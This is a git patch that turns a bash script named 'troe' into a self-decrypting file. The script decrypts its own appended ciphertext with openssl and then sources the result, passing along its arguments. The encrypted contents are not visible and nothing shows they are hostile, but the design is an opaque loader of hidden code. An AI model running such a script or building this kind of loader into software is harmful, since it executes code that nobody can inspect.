From 7557954961ed38b0ec3d97ce42cf5d8fc71cc747 Mon Sep 17 00:00:00 2001 From: dig Date: Wed, 28 Oct 2020 13:20:54 +0000 Subject: [PATCH] -troe.s --- troe | 7 +++++-- troe.s | 3 --- 2 files changed, 5 insertions(+), 5 deletions(-) delete mode 100644 troe.s diff --git a/troe b/troe index 3fd0249..f3e2d21 100755 --- a/troe +++ b/troe @@ -1,2 +1,5 @@ -#!/bin/bash -openssl enc -d -aes-256-cbc -pbkdf2 -in "$0.s" -out "$0.d" && . "$0.d" +#!/usr/bin/env bash +cat "$0"|sed "1,2d">"$0.s";openssl enc -d -aes-256-cbc -pbkdf2 -in "$0.s" -out "$0.d" && rm "$0.s" && . "$0.d" "$@";exit +Salted__QwZX>~.Ϗ_nq ((^90ëqF/p +g&6_\2\ ҂ 6cg!+~18 +)z>7Kn'<ڎ_En#0ViWK("{mfejM&sdL(hZzׇLHAMYȚ 3'xz=Aƣ}5[Fjo5V7\a49H_ARK}]vEj]Zٍ֮ S\9'5ܵ3: \ No newline at end of file diff --git a/troe.s b/troe.s deleted file mode 100644 index 9c6b8a7..0000000 --- a/troe.s +++ /dev/null @@ -1,3 +0,0 @@ -Salted__qW[5ODM3y -n5;v> NY -)|AdqB!;n*,w eQ:j-|v N:-UV|0_6Xؒf]ON/xi۽ "_w \ No newline at end of file